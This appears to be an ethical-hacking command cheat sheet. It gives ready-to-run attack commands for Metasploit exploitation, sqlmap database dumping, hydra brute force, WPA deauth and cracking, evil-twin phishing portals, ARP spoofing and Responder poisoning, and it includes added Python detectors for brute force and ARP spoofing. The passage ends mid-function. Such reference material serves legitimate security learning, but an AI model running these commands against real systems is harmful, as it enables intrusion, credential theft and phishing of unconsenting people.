ARG Cyber Skill Hub
Ethical Hacking • Cyber Security • Termux • PowerShell • CMD
Purpose: Network discovery, service & OS detection
sudo nmap 192.168.1.10
Performs a basic scan to find open ports on the target host.
sudo nmap -sC -sV 192.168.1.10
Runs default scripts and detects service versions on open ports.
sudo nmap -p- -A 192.168.1.10
Scans all TCP ports with OS detection and aggressive enumeration.
Purpose: GUI interface for Nmap (visual reports)
sudo zenmap
Launches the graphical interface for Nmap scanning.
Target: 192.168.1.0/24
Scans the entire local subnet using GUI scan profiles.
Purpose: Find live hosts in local network (ARP scan)
sudo netdiscover -r 192.168.1.0/24
Actively scans the subnet to discover all connected devices.
sudo netdiscover -p
Runs in passive mode to silently detect devices via ARP traffic.
Purpose: OSINT automation framework
recon-ng
Starts the Recon-ng interactive console.
workspaces create target
Creates a new workspace to organize reconnaissance data.
modules use recon/domains-hosts/google_site_web
Loads a module to gather hosts and subdomains from Google.
set SOURCE example.com
Sets the target domain for OSINT collection.
run
Executes the loaded reconnaissance module.
Purpose: Visual OSINT relationship mapping
maltego
Launches the Maltego GUI for visual intelligence gathering.
Domain → To DNS Name → To IP Address
Uses transforms to map relationships between domain, DNS, and IP.
Purpose: Emails, subdomains, hosts collection
theHarvester -d example.com -b google,bing
Collects emails and subdomains from Google and Bing.
theHarvester -d example.com -b all -f report.html
Gathers data from all sources and saves output as an HTML report.
Purpose: Deep domain information gathering
dmitry -winsepo example.com
Performs whois lookup, subdomain search, and email harvesting.
Purpose: DNS records & subdomain brute force
dnsenum example.com
Enumerates DNS records and common subdomains for a domain.
dnsenum --dnsserver 8.8.8.8 -f subdomains.txt example.com
Uses a wordlist to brute-force subdomains using a specific DNS server.
Purpose: DNS reconnaissance
dnsrecon -d example.com
Enumerates DNS records and zone information.
dnsrecon -d example.com -t brt
Performs brute-force subdomain enumeration.
Purpose: Domain registration info
whois example.com
Shows domain registration and owner information.
whois 8.8.8.8
Displays ownership and network info of an IP address.
Purpose: Advanced subdomain enumeration
amass enum -passive -d example.com
Collects subdomains using passive data sources only.
amass enum -active -d example.com -o subs.txt
Performs active enumeration and saves results to a file.
Purpose: Full vulnerability scanning
sudo gvm-setup
Initial setup for Greenbone Vulnerability Manager services and feeds.
sudo gvm-start
Starts the OpenVAS/GVM services in background.
https://127.0.0.1:9392
Access the web dashboard to manage scans and view reports.
Purpose: Web server misconfiguration scan
nikto -h http://example.com
Scans a web server for common vulnerabilities and misconfigurations.
nikto -h http://example.com -Tuning x
Runs Nikto with advanced tuning options for deeper checks.
Purpose: WordPress vulnerability scanner
wpscan --url https://site.com --enumerate vp,vt,u
Enumerates vulnerable plugins, themes, and users on WordPress site.
wpscan --url https://site.com --api-token YOUR_TOKEN
Uses WPScan API token for detailed vulnerability database results.
Purpose: Linux security auditing
sudo lynis audit system
Audits Linux system for security weaknesses and misconfigurations.
sudo lynis show suggestions
Shows recommended security improvements after audit.
Purpose: Automated recon + vuln framework
legion
Launches Legion GUI for automated reconnaissance and scanning.
Add target → Run modules
Adds targets and runs built-in scanning modules automatically.
Purpose: Template-based vulnerability scanner
nuclei -u https://site.com -t cves/
Scans target using CVE templates for known vulnerabilities.
nuclei -l targets.txt -severity critical,high
Scans multiple targets and reports only high/critical issues.
Purpose: Exploit + payload framework
msfconsole
Starts Metasploit interactive console.
search apache
Searches Metasploit database for Apache-related exploits.
use exploit/multi/http/apache_mod_cgi_bash_env_exec
Loads a specific exploit module for Apache vulnerability.
set RHOSTS 192.168.1.10
Sets the target IP address for exploitation.
run
Executes the selected exploit module.
Purpose: Browser exploitation framework
sudo beef-xss
Starts BeEF server for browser exploitation testing in lab.
Hook URL → Test in lab browser
Uses the hook URL in a test browser to demonstrate client-side attacks.
Purpose: GUI for Metasploit
armitage
Launches Armitage graphical interface for Metasploit.
Connect to msfrpcd
Connects Armitage to Metasploit RPC service to control exploits.
Purpose: Search Exploit-DB locally
searchsploit apache 2.4
Searches local exploit database for Apache 2.4 exploits.
searchsploit -m exploits/linux/remote/12345.py
Copies an exploit PoC to your local directory.
Purpose: Phishing & social engineering labs
setoolkit
Starts Social Engineering Toolkit interactive menu.
1) Social-Engineering Attacks → 2) Website Attack Vectors
Launches phishing website cloning attack module (lab only).
Purpose: View the system's IP address and network interfaces.
ip a
ifconfig
hostname -I
nmcli device status
These commands show your device's IP address, interfaces and network state.
Purpose: Test internet and server reachability.
ping google.com
ping -c 4 8.8.8.8
traceroute google.com
mtr google.com
Ping reports latency; traceroute and mtr show the route path.
Purpose: Scan open ports and services (authorized targets only).
nmap 192.168.1.1
nmap -sS 192.168.1.1
nmap -A 192.168.1.1
nmap -p 1-1000 192.168.1.1
-A is used for service detection and OS fingerprinting.
Purpose: Capture and analyze network packets.
tcpdump
tcpdump -i wlan0
tcpdump -n port 80
tcpdump -w capture.pcap
The captured file can be analyzed in Wireshark.
Purpose: Find devices connected to the local network.
arp -a
ip neigh
netdiscover -r 192.168.1.0/24
arp-scan --localnet
Shows which devices are connected on the local LAN.
Purpose: Put the WiFi interface into monitor mode (lab testing only).
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up
iwconfig
In monitor mode, wireless packets can be captured.
Purpose: Get details of running services.
nmap -sV 192.168.1.1
nmap --script=banner 192.168.1.1
whatweb http://192.168.1.1
nikto -h http://192.168.1.1
Fingerprints web services.
Purpose: Forward and route network traffic (lab use).
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -L
route -n
ip route show
Used for man-in-the-middle labs and routing tests.
Purpose: Create, remove, copy, move, and organize files & folders in Linux systems.
mkdir tools
Creates a new directory named tools.
rmdir tools
Deletes an empty directory named tools.
rm -rf tools
Force deletes the directory tools with all files inside (dangerous).
cp file.txt /home/kali/
Copies file.txt to another directory.
mv file.txt newfile.txt
Renames or moves a file.
Purpose: Read, view, and edit files from the terminal.
cat file.txt
Displays the entire content of a file.
less file.txt
View large files page by page.
nano file.txt
Edit a file using nano text editor.
vim file.txt
Edit a file using vim editor (advanced editor).
Purpose: Check disk usage and storage details.
df -h
Shows available disk space in human readable format.
du -sh *
Shows folder size of all directories.
lsblk
Displays connected storage devices.
mount
Shows mounted drives.
Purpose: Monitor and control running processes.
ps aux
Lists all running processes.
top
Shows live running processes and system usage.
htop
Advanced process viewer (if installed).
kill -9 PID
Force stop a running process by PID.
Purpose: Get hardware and OS information.
uname -a
Displays kernel and OS information.
neofetch
Shows system info with cool terminal UI.
uptime
Shows how long the system is running.
free -h
Displays RAM usage.
Purpose: View and configure network interfaces and IP addresses.
ip a
Displays all network interfaces and assigned IP addresses.
ip link show
Shows network interface status (UP/DOWN).
ifconfig
Displays network configuration (legacy command).
nmcli device status
Shows NetworkManager device status.
Purpose: Test internet and network reachability.
ping 8.8.8.8
Tests connectivity to Google DNS server.
ping google.com
Checks if DNS resolution and internet is working.
traceroute google.com
Shows the network path packets take to reach the destination.
mtr google.com
Live traceroute + ping combined (if installed).
Purpose: Discover open ports and services on authorized targets.
nmap 192.168.1.1
Scans common ports on a target host.
nmap -sV 192.168.1.1
Detects running services and versions.
nmap -A 192.168.1.1
Performs aggressive scan (OS, services, scripts).
nmap -p- 192.168.1.1
Scans all 65535 TCP ports.
Purpose: View active network connections and listening services.
ss -tuln
Shows TCP/UDP listening ports.
netstat -tulnp
Displays network services with PID (legacy).
lsof -i
Lists processes using network connections.
whois google.com
Displays domain ownership information.
Purpose: Capture and analyze network traffic on authorized networks.
tcpdump -i wlan0
Captures packets on wlan0 interface.
tcpdump -i eth0 port 80
Captures only HTTP traffic.
tcpdump -w capture.pcap
Saves captured packets to a file.
wireshark
Opens GUI packet analyzer tool.
Purpose: Send HTTP requests and test web endpoints from terminal.
curl https://example.com
Fetches and displays the raw HTML response of a website.
curl -I https://example.com
Shows only HTTP response headers.
curl -X POST -d "user=admin&pass=1234" https://site.com/login
Sends a POST request with form data.
curl -o page.html https://example.com
Downloads and saves the webpage to a file.
Purpose: Download web content and files from the internet.
wget https://example.com/file.zip
Downloads a file from the given URL.
wget -O index.php https://example.com
Downloads a webpage and saves it as index.php.
wget -r https://example.com
Recursively downloads a website (use only on owned sites).
wget -c https://example.com/bigfile.zip
Continues a previously interrupted download.
Purpose: Scan web servers for misconfigurations and known vulnerabilities.
nikto -h https://example.com
Performs a basic vulnerability scan on a web server.
nikto -h http://192.168.1.10
Scans a local server by IP address.
nikto -h https://example.com -o report.html
Saves scan results into an HTML report.
nikto -Tuning x -h https://example.com
Runs advanced tuning options for deeper scanning.
Purpose: Brute-force hidden directories and files on websites.
gobuster dir -u https://example.com -w /usr/share/wordlists/dirb/common.txt
Finds hidden directories using a wordlist.
gobuster dir -u https://example.com -w wordlist.txt -x php,txt,html
Searches for files with specific extensions.
gobuster dns -d example.com -w subdomains.txt
Brute-forces subdomains of a domain.
gobuster vhost -u https://example.com -w vhosts.txt
Finds virtual hosts on the same IP.
Purpose: Web path and directory brute-forcing tool.
python3 dirsearch.py -u https://example.com
Scans for hidden directories using default wordlists.
python3 dirsearch.py -u https://example.com -e php,txt,html
Searches for files with specific extensions.
python3 dirsearch.py -u https://example.com -w wordlist.txt
Uses a custom wordlist.
python3 dirsearch.py -u https://example.com -t 50
Increases scanning threads for faster results.
Purpose: Identify technologies used by a website.
whatweb https://example.com
Detects CMS, frameworks, and server technologies.
whatweb -a 3 https://example.com
Runs aggressive detection mode.
whatweb --log-json report.json https://example.com
Saves technology fingerprint into JSON file.
whatweb --no-errors https://example.com
Suppresses error output for clean results.
Purpose: Intercept, modify, and analyze web requests.
burpsuite
Launches Burp Suite GUI.
# Configure browser proxy to 127.0.0.1:8080
Routes browser traffic through Burp for interception.
# Intercept → Repeater → Intruder
Allows manual testing and automated attacks in labs.
# Generate reports from Dashboard
Creates vulnerability reports for documentation.
Purpose: Automated web vulnerability scanner.
zaproxy
Launches ZAP GUI.
# Automated Scan → Start
Runs automatic vulnerability scanning.
# Active Scan (after crawling)
Performs deeper security testing.
# Export report as HTML/PDF
Generates vulnerability reports.
Purpose: Automate detection and exploitation of SQL Injection (lab only).
sqlmap -u "https://site.com?id=1" --dbs
Enumerates available databases.
sqlmap -u "https://site.com?id=1" --tables
Lists tables from the vulnerable database.
sqlmap -u "https://site.com?id=1" --dump
Extracts database contents (authorized labs only).
sqlmap -r request.txt --batch
Uses raw HTTP request file for testing.
Purpose: Perform online login brute-force attacks on network services (lab only).
hydra -l admin -P rockyou.txt ssh://192.168.1.10
Attempts SSH login with username "admin" using a password wordlist.
hydra -L users.txt -P pass.txt ftp://192.168.1.10
Uses multiple usernames and passwords against an FTP service.
hydra -l admin -P rockyou.txt 192.168.1.10 http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid"
Performs HTTP POST form login testing for web applications.
hydra -t 4 -f -V -l root -P rockyou.txt ssh://192.168.1.10
Limits threads, stops on first success, and shows verbose output.
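As an added defensive counterpart to the hydra runs above (not part of the original cheat sheet): a small Python detector that reads sshd auth-log lines and reports the burst-of-failures-then-success pattern a wordlist attack leaves behind. The log lines are constructed samples, and the thresholds (5 failures within 60 seconds) are assumptions to tune.

```python
"""Spot password-guessing bursts against sshd in auth log lines.

Added example (not part of the original cheat sheet). The log lines are
constructed to mimic OpenSSH syslog output; thresholds are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of /var/log/auth.log: five rapid failures for "admin"
# and one for "root" from one source, then an accepted password login.
SAMPLE_LOG = """\
Mar  3 10:15:01 lab sshd[2101]: Failed password for admin from 192.168.1.50 port 50122 ssh2
Mar  3 10:15:01 lab sshd[2102]: Failed password for admin from 192.168.1.50 port 50123 ssh2
Mar  3 10:15:02 lab sshd[2103]: Failed password for admin from 192.168.1.50 port 50124 ssh2
Mar  3 10:15:02 lab sshd[2104]: Failed password for invalid user root from 192.168.1.50 port 50125 ssh2
Mar  3 10:15:03 lab sshd[2105]: Failed password for admin from 192.168.1.50 port 50126 ssh2
Mar  3 10:15:04 lab sshd[2106]: Accepted password for admin from 192.168.1.50 port 50127 ssh2
Mar  3 10:20:00 lab sshd[2210]: Failed password for alice from 192.168.1.77 port 41000 ssh2
Mar  3 10:45:00 lab sshd[2300]: Accepted publickey for alice from 192.168.1.77 port 41001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2}\s\d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_events(log_text, year=2026):
    """Turn matching sshd lines into dicts; syslog omits the year, so one is supplied."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        stamp = " ".join(m["ts"].split())  # collapse the padded day ("Mar  3")
        events.append({
            "ts": datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S"),
            "ip": m["ip"], "user": m["user"],
            "result": m["result"], "method": m["method"],
        })
    return events


def find_bruteforce(events, threshold=5, window_s=60):
    """Alert per source IP with >= threshold failures inside a sliding window_s window.

    An accepted login shortly after the burst is flagged too: hydra -f stops on the
    first hit, so "N failures then one Accepted" is the signature of a guessed password.
    """
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev["ip"]].append(ev)

    alerts = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        fails = [e for e in evs if e["result"] == "Failed"]
        for i in range(len(fails)):
            j = i
            while (j + 1 < len(fails)
                   and (fails[j + 1]["ts"] - fails[i]["ts"]).total_seconds() <= window_s):
                j += 1
            if j - i + 1 < threshold:
                continue
            burst_end = fails[j]["ts"]
            success = any(
                e["result"] == "Accepted"
                and 0 <= (e["ts"] - burst_end).total_seconds() <= window_s
                for e in evs
            )
            alerts[ip] = {
                "failures": j - i + 1,
                "users": sorted({e["user"] for e in fails[i:j + 1]}),
                "first": fails[i]["ts"], "last": burst_end,
                "success_after_burst": success,
            }
            break  # one alert per source is enough for triage
    return alerts


if __name__ == "__main__":
    for ip, a in find_bruteforce(parse_events(SAMPLE_LOG)).items():
        print(f"{ip}: {a['failures']} failures for {a['users']} "
              f"between {a['first']:%H:%M:%S} and {a['last']:%H:%M:%S}; "
              f"login succeeded afterwards: {a['success_after_burst']}")
```

Once this fires, sshd's MaxAuthTries and a fail2ban-style ban on the source address are the usual controls; key-only authentication removes the password-guessing surface entirely.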
Purpose: Offline password hash cracking using CPU-based attacks.
john --wordlist=rockyou.txt hashes.txt
Cracks password hashes using a wordlist.
john --rules --wordlist=rockyou.txt hashes.txt
Applies mangling rules to generate more password candidates.
john --show hashes.txt
Displays successfully cracked passwords.
john --format=raw-md5 hashes.txt
Specifies hash format for better accuracy.
Purpose: GPU-accelerated password cracking tool.
hashcat -m 0 -a 0 hashes.txt rockyou.txt
Dictionary attack on MD5 hashes using a wordlist.
hashcat -m 1000 -a 0 ntlm.txt rockyou.txt
Cracks Windows NTLM password hashes.
hashcat -a 3 -m 0 hashes.txt ?a?a?a?a?a?a
Brute-force attack with mask patterns.
hashcat --show -m 0 hashes.txt
Shows cracked passwords.
Purpose: Generate custom password wordlists.
crunch 6 6 abc123 -o small.txt
Generates all 6-character combinations using abc123.
crunch 8 10 -o biglist.txt
Creates a wordlist with passwords from 8 to 10 characters.
crunch 4 4 0123456789 -o pin.txt
Generates all possible 4-digit PIN codes.
crunch 8 8 -t @@@@2026 -o pattern.txt
Generates passwords matching a specific pattern.
Purpose: Generate wordlists from website content.
cewl https://example.com -w words.txt
Extracts words from a website and saves them to a file.
cewl https://example.com -d 2 -w deep.txt
Crawls website up to depth 2 to collect more words.
cewl https://example.com --with-numbers -w mixed.txt
Includes numbers in generated wordlist.
cewl https://example.com -m 5 -w minlen.txt
Collects words with minimum length of 5 characters.
Purpose: Collection of high-quality wordlists for security testing.
sudo apt install seclists
Installs the SecLists wordlist collection.
ls /usr/share/seclists/Passwords/
Lists available password wordlists.
cat /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt
Views a large common passwords list.
cp /usr/share/seclists/Passwords/Common-Credentials/*.txt ./wordlists/
Copies wordlists to your local project folder.
Purpose: Capture Wi-Fi handshakes and audit WPA/WPA2 passwords in lab environments.
airmon-ng start wlan0
Enables monitor mode on the wireless adapter.
airodump-ng wlan0mon
Scans nearby Wi-Fi networks and connected clients.
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
Targets a specific access point and saves handshake packets.
aircrack-ng -w rockyou.txt capture-01.cap
Attempts to crack the captured WPA/WPA2 handshake using a wordlist.
Purpose: Automated Wi-Fi auditing framework for quick lab testing.
sudo wifite
Launches the interactive Wi-Fi attack automation tool.
sudo wifite --wps
Targets only WPS-enabled networks.
sudo wifite --dict rockyou.txt
Uses a custom dictionary for password cracking.
sudo wifite --kill
Kills interfering network processes before attacks.
Purpose: Test WPS PIN security on routers in controlled labs.
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
Starts a verbose WPS PIN audit against a target access point.
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K 1
Attempts Pixie Dust attack if supported by the router.
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6
Forces testing on a specific Wi-Fi channel.
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -t 5
Sets timeout between attempts to avoid lockouts.
Purpose: Enable monitor mode and discover nearby wireless networks.
# Check wireless interfaces
ip link
# Enable monitor mode (replace wlan0)
sudo airmon-ng check kill
sudo airmon-ng start wlan0
# Passive recon
airodump-ng wlan0mon
Identifies nearby APs, channels, encryption (WPA2/WPA3), clients, and signal strength for attack surface mapping.
Purpose: Capture WPA2/WPA3 handshakes for offline password auditing (lab networks).
# Capture specific AP (replace BSSID & channel)
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# Deauth to force handshake (lab AP only)
aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon
# Verify handshake captured
aircrack-ng capture-01.cap
Used in authorized audits to collect handshakes for offline cracking against weak PSKs in lab networks.
Purpose: Capture PMKID without deauth or client interaction.
# Capture PMKID
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1
# Extract hash
hcxpcapngtool -o pmkid.hc22000 pmkid.pcapng
# Offline crack (lab only)
hashcat -m 22000 pmkid.hc22000 wordlist.txt
Effective for auditing weak PSKs on modern routers without client presence (authorized environments only).
Purpose: Simulate rogue AP with phishing captive portal for security awareness training.
# Create fake AP (hostapd)
sudo apt install hostapd dnsmasq
# Launch rogue AP (example)
hostapd hostapd.conf
# Redirect victims to captive portal (iptables)
sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
# Serve phishing page (lab awareness)
php -S 0.0.0.0:8080
Demonstrates Evil Twin risks, credential harvesting via captive portals, and user awareness training scenarios.
Purpose: Automate Evil Twin + phishing portal for awareness labs.
# Install
sudo apt install wifiphisher
# Launch phishing attack (lab only)
sudo wifiphisher
# Choose scenario (firmware update, portal login, etc.)
# Select target AP when prompted
Used for red-team simulations and awareness training to demonstrate how users fall for rogue Wi-Fi portals.
Purpose: Wireless IDS and packet sniffer with a web interface.
kismet
Starts Kismet service and web UI.
http://localhost:2501
Opens the Kismet web dashboard in a browser.
kismet -c wlan0
Starts capture on a specific wireless interface.
kismet -c wlan0mon --no-line-wrap
CLI capture without line wrapping for logs.
Purpose: Evil-Twin attack framework for Wi-Fi security labs.
git clone https://github.com/FluxionNetwork/fluxion.git
Downloads the Fluxion framework from GitHub.
cd fluxion
Moves into the Fluxion project directory.
sudo ./fluxion.sh
Launches the Fluxion interactive attack wizard.
sudo ./fluxion.sh -i
Runs Fluxion in interactive guided mode.
Purpose: GUI-based Wi-Fi auditing tool for beginners.
fern-wifi-cracker
Launches the graphical interface for Wi-Fi testing.
sudo fern-wifi-cracker
Runs Fern with elevated permissions.
fern-wifi-cracker --help
Displays available options and usage help.
fern-wifi-cracker --version
Shows the installed version.
Purpose: Capture and analyze network packets.
wireshark
Launches the Wireshark GUI packet analyzer.
sudo wireshark
Runs Wireshark with elevated permissions.
tshark -i eth0
CLI capture on interface eth0.
tshark -i eth0 -w capture.pcap
Saves captured packets to a file.
Purpose: Modular MITM framework for network testing in labs.
sudo bettercap -iface eth0
Starts Bettercap on a specific network interface.
net.probe on
Discovers live hosts on the local network.
arp.spoof on
Performs ARP spoofing in a test environment.
http.proxy on
Enables HTTP proxy for traffic inspection.
Purpose: Perform ARP poisoning and MITM testing in controlled networks.
sudo ettercap -T -q -i eth0 -M arp:remote /victim/ /router/
Text-mode ARP spoofing between victim and router.
sudo ettercap -G
Launches the graphical interface.
sudo ettercap -T -i eth0 -M arp:remote /192.168.1.5/ /192.168.1.1/
Targets specific IP addresses.
sudo ettercap -T -q -i eth0 -M arp:remote // //
MITM against all hosts in the subnet (lab only).
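Added example, not part of the original page, covering the bettercap arp.spoof and ettercap arp:remote entries above from the defender's side: a Python checker over constructed `tcpdump -n arp` style lines that flags an IP whose MAC flips and a MAC that starts answering for both the router and a client. The MAC addresses and timestamps are made up.

```python
"""Detect ARP cache poisoning (the arp.spoof / ettercap -M arp:remote scenario)
from ARP traffic.

Added example, not part of the original page. The lines are constructed in the
style of `tcpdump -n arp` output; the MAC addresses are made up.
"""
import re
from collections import defaultdict

# Constructed capture: 192.168.1.1 (router) and 192.168.1.5 (client) answer
# normally, then a third MAC starts claiming both addresses unsolicited.
SAMPLE_ARP = """\
10:00:01.000100 ARP, Request who-has 192.168.1.1 tell 192.168.1.5, length 28
10:00:01.000400 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:01, length 28
10:00:05.000100 ARP, Request who-has 192.168.1.5 tell 192.168.1.1, length 28
10:00:05.000300 ARP, Reply 192.168.1.5 is-at 00:11:22:33:44:05, length 28
10:00:30.000100 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:99, length 28
10:00:30.000200 ARP, Reply 192.168.1.5 is-at de:ad:be:ef:00:99, length 28
10:00:32.000100 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:99, length 28
"""

ARP_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+) ARP, (?:"
    r"Reply (?P<ip>[\d.]+) is-at (?P<mac>[0-9a-fA-F:]{17})"
    r"|Request who-has (?P<target>[\d.]+) tell (?P<asker>[\d.]+))"
)


def detect_arp_spoof(capture_text, known=None):
    """Return (ip_to_mac table, alerts).

    Alert kinds, strongest first:
      mac-changed        an IP's MAC differs from what was seen (or trusted) before
      mac-claims-many    one MAC now answers for several IPs (router AND client)
      unsolicited-reply  a Reply with no preceding who-has for that IP (gratuitous
                         ARP is sometimes legitimate, so alone this is low confidence)
    `known` may seed the table with trusted pairs, e.g. the gateway's real MAC.
    """
    table = {ip: mac.lower() for ip, mac in (known or {}).items()}
    ips_by_mac = defaultdict(set)
    for ip, mac in table.items():
        ips_by_mac[mac].add(ip)
    pending = set()  # IPs somebody asked about and that may legitimately reply
    alerts = []

    for line in capture_text.splitlines():
        m = ARP_RE.match(line)
        if not m:
            continue
        if m["target"]:
            pending.add(m["target"])
            continue
        ts, ip, mac = m["ts"], m["ip"], m["mac"].lower()
        solicited = ip in pending
        pending.discard(ip)

        previous = table.get(ip)
        if previous is not None and previous != mac:
            alerts.append({"ts": ts, "kind": "mac-changed", "ip": ip,
                           "old": previous, "new": mac})
        table[ip] = mac
        if ip not in ips_by_mac[mac]:
            ips_by_mac[mac].add(ip)
            if len(ips_by_mac[mac]) > 1:
                alerts.append({"ts": ts, "kind": "mac-claims-many", "mac": mac,
                               "ips": sorted(ips_by_mac[mac])})
        if not solicited:
            alerts.append({"ts": ts, "kind": "unsolicited-reply", "ip": ip, "mac": mac})
    return table, alerts


def poisoned_ips(alerts):
    """IPs whose binding flipped: the hosts whose traffic is now being relayed."""
    return sorted({a["ip"] for a in alerts if a["kind"] == "mac-changed"})


if __name__ == "__main__":
    table, alerts = detect_arp_spoof(SAMPLE_ARP)
    for a in alerts:
        print(a)
    print("current table:", table)
    print("poisoned:", poisoned_ips(alerts))
```

Dynamic ARP inspection on managed switches, or a static ARP entry for the gateway on sensitive hosts, is the usual control; the same logic runs unchanged on a live `tcpdump -l -n arp` pipe.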
Purpose: Command-line packet capture and filtering.
sudo tcpdump -i eth0
Captures live traffic on interface eth0.
sudo tcpdump -i eth0 -w capture.pcap
Saves captured packets to a file.
sudo tcpdump -i eth0 tcp port 80
Filters HTTP traffic only.
sudo tcpdump -r capture.pcap
Reads packets from a saved capture file.
Purpose: LLMNR/NBT-NS poisoning tool for Windows network labs.
sudo responder -I eth0
Starts Responder on a network interface.
sudo responder -I eth0 -dwv
Enables detailed logs and rogue servers.
sudo responder -I eth0 -A
Analyze mode without poisoning (safe lab analysis).
cat /usr/share/responder/logs/*
Views captured hashes and events.
Purpose: Automated detection and exploitation of SQL injection vulnerabilities in web applications.
sqlmap -u "http://target.com/page.php?id=1" --dbs
Enumerates available databases if SQL injection is found.
sqlmap -u "http://target.com/page.php?id=1" -D testdb --tables
Lists tables inside a specific database.
sqlmap -u "http://target.com/page.php?id=1" -D testdb -T users --dump
Dumps records from the selected table.
Purpose: Advanced Cross-Site Scripting (XSS) vulnerability scanner and payload generator.
xsstrike -u "http://target.com/search?q=test"
Scans a parameter for reflected and DOM-based XSS.
xsstrike -u "http://target.com/search?q=test" --crawl
Crawls the website to discover additional injectable endpoints.
xsstrike -u "http://target.com/search?q=test" --fuzzer
Fuzzes input parameters with multiple XSS payloads.
Purpose: Finds hidden directories and files on web servers using wordlists.
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
Bruteforces common directories.
gobuster dir -u http://target.com -w wordlist.txt -x php,txt,html
Searches for files with specific extensions.
gobuster dns -d target.com -w subdomains.txt
Performs subdomain enumeration.
Purpose: Discovers hidden GET and POST parameters in web applications.
arjun -u http://target.com/page.php
Finds hidden parameters in GET requests.
arjun -u http://target.com/api -m POST
Tests hidden POST parameters.
arjun -u http://target.com/page.php -o found_params.txt
Saves discovered parameters to a file.
Purpose: Scans web servers for outdated software, misconfigurations, and known vulnerabilities.
nikto -h http://target.com
Performs a basic vulnerability scan.
nikto -h http://target.com -o report.txt
Saves scan results to a report file.
nikto -h http://target.com -Tuning x
Runs specific vulnerability tests.
Purpose: Fast web fuzzer for discovering directories, parameters, and hidden endpoints.
ffuf -u http://target.com/FUZZ -w wordlist.txt
Fuzzes directories on the target website.
ffuf -u http://target.com/page.php?FUZZ=test -w params.txt
Discovers hidden parameters.
ffuf -u http://target.com/FUZZ -w wordlist.txt -mc 200
Shows only HTTP 200 OK responses.
Purpose: Search and profile internet-exposed devices, services, and vulnerabilities across the global internet.
shodan init YOUR_API_KEY
Initializes Shodan CLI with your API key.
shodan search "port:22 country:IN"
Finds exposed SSH services in India.
shodan host 8.8.8.8
Displays open services and metadata of a specific host.
Purpose: Enumerate subdomains and TLS certificates issued for a target domain using certificate transparency logs.
curl "https://crt.sh/?q=%25example.com&output=json"
Fetches all certificates issued for example.com in JSON format.
curl "https://crt.sh/?q=%25example.com" | grep example.com
Quickly extracts subdomains from HTML output.
curl "https://crt.sh/?q=%25.example.com&output=json" | jq '.[].name_value'
Extracts the name_value field of every certificate record with jq.
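Added example (not the page's own code) that does in Python what the crt.sh commands above attempt with grep and jq: normalise the newline-separated name_value entries, drop out-of-scope names that a %example.com LIKE query also returns, and list wildcard, expired and unexpected-issuer certificates, which is the same data read as a CT-monitoring control. The records are constructed in crt.sh's JSON field layout; the CA allow-list is an assumption.

```python
"""Turn crt.sh JSON (the curl ... &output=json query) into a clean host list and
flag certificates an organisation would want to look at.

Added example, not from the original page. The records are constructed in the
field layout crt.sh returns (name_value, issuer_name, common_name, not_after);
the CA allow-list is an assumption to replace with your own.
"""
import json
from datetime import datetime

# Constructed records: multi-name certificates (name_value is newline separated),
# a wildcard, mixed case, an expired cert, and an out-of-scope name that a
# LIKE-style %example.com query also matches.
SAMPLE_CRTSH_JSON = r"""[
 {"issuer_name": "C=US, O=Let's Encrypt, CN=R3", "common_name": "www.example.com",
  "name_value": "example.com\nwww.example.com", "not_after": "2026-06-01T00:00:00"},
 {"issuer_name": "C=US, O=Let's Encrypt, CN=R3", "common_name": "*.dev.example.com",
  "name_value": "*.dev.example.com\nDEV.example.com", "not_after": "2026-05-01T00:00:00"},
 {"issuer_name": "C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1",
  "common_name": "vpn.example.com", "name_value": "vpn.example.com",
  "not_after": "2024-01-01T00:00:00"},
 {"issuer_name": "C=XX, O=Unknown CA", "common_name": "mail.example.com",
  "name_value": "mail.example.com\nbadexample.com", "not_after": "2026-09-01T00:00:00"}
]"""


def load(json_text):
    return json.loads(json_text)


def in_scope(name, domain):
    return name == domain or name.endswith("." + domain)


def extract_hosts(records, domain):
    """Unique in-scope hostnames and, separately, the bases of wildcard certs.

    Wildcards matter to both sides: they hide real hostnames from CT, and a
    forgotten *.dev certificate covers hosts nobody inventoried.
    """
    hosts, wildcards = set(), set()
    for rec in records:
        for raw in rec["name_value"].split("\n"):
            name = raw.strip().lower()
            if name.startswith("*."):
                name = name[2:]
                if in_scope(name, domain):
                    wildcards.add(name)
            if in_scope(name, domain):
                hosts.add(name)
    return sorted(hosts), sorted(wildcards)


def unexpected_issuers(records, allowed_cas):
    """Certificates from a CA outside the organisation's allow-list: the CT
    monitoring case (mis-issuance or shadow IT) rather than the recon case."""
    return sorted(
        (rec["common_name"], rec["issuer_name"])
        for rec in records
        if not any(ca in rec["issuer_name"] for ca in allowed_cas)
    )


def expired(records, now_iso):
    """Common names whose certificate has lapsed: often a decommissioned host
    whose DNS record still exists and should be cleaned up."""
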